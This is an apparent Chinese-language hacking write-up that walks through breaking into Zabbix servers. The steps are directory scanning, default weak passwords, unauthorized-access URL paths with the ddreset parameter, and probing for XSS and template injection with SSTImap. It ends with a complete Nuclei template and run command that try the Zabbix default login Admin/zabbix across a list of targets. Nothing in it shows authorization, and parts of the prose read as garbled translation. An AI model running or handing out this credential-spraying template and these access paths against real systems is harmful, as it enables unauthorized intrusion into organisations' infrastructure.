利用谷歌搜索历史漏洞:zabbix漏洞
通过目录扫描扫描到后台,谷歌搜索一下有没有默认弱口令
成功进去了,挖洞便是这么大略
搜索文章还报过未授权访问漏洞,打一波
/overview.php?ddreset=1/srv_status.php?ddreset=1/latest.php?ddreset=1/zabbix.php?action=problem.view&ddreset=1
又成功进去了,已经打消缓存在拼接路径的,进去成功探求功能点,在搜索位置输入任何东西,前端页面就会显示什么,预测可能存在反射xss,但没什么用,连续测试ssti注入
不存在,这个站还可以getshell,但是点到位置,后台进去了,人也进去了黑盒测试ssti注入这个工具推举一下,用这个工具还挖出过几个洞,这个觉得已经是公开最好的工具了:https://github.com/vladko312/SSTImap
顺便写了一个nuclei批量默认密码验证脚本
【Nuclei-Poc】id: zabbix-default-credential-checkinfo: name: Zabbix Default Credential Check author: severity: high description: Check for default credentials in Zabbix. tags: zabbix,default,credrequests: - method: POST path: - "{{BaseURL}}/zabbix/index.php" body: | name=Admin&password=zabbix&autologin=1&enter=Sign+in headers: Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Origin: "{{BaseURL}}" Referer: "{{BaseURL}}/zabbix/" matchers-condition: and matchers: - type: word words: - "Location: zabbix.php?action=dashboard.view" part: header - type: status status: - 302
【验证】
.\nuclei -l xx.txt -t xx.yaml